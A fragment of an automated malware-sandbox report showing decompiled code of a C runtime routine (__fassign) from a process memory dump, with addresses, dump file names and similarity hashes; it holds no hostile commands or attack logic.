                                                                                                                                                        						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                        						goto L65;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v16 > 4) {
                                                                                                                                                        						goto L29;
                                                                                                                                                        					}
                                                                                                                                                        					_t115 = E0237EE02(_v24, 0, 0x10);
                                                                                                                                                        					_t170 = _t170 + 0xc;
                                                                                                                                                        					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                        					goto L65;
                                                                                                                                                        				} else {
                                                                                                                                                        					goto L29;
                                                                                                                                                        				}
                                                                                                                                                        			}

























                                                                                                                                                        0x023aed43
                                                                                                                                                        0x023aed4b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000

APIs
Memory Dump Source
• Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
• Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: 52600a615ae28d9db929aff25741209df9ffedcf5766315f957be73e03fc1d7f
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: 6B918C31D0020AEFDF34DFA8C8457AEB7B4FF45708F20847AD415A6A52E7389A81CB91
Uniqueness

Uniqueness Score: -1.00%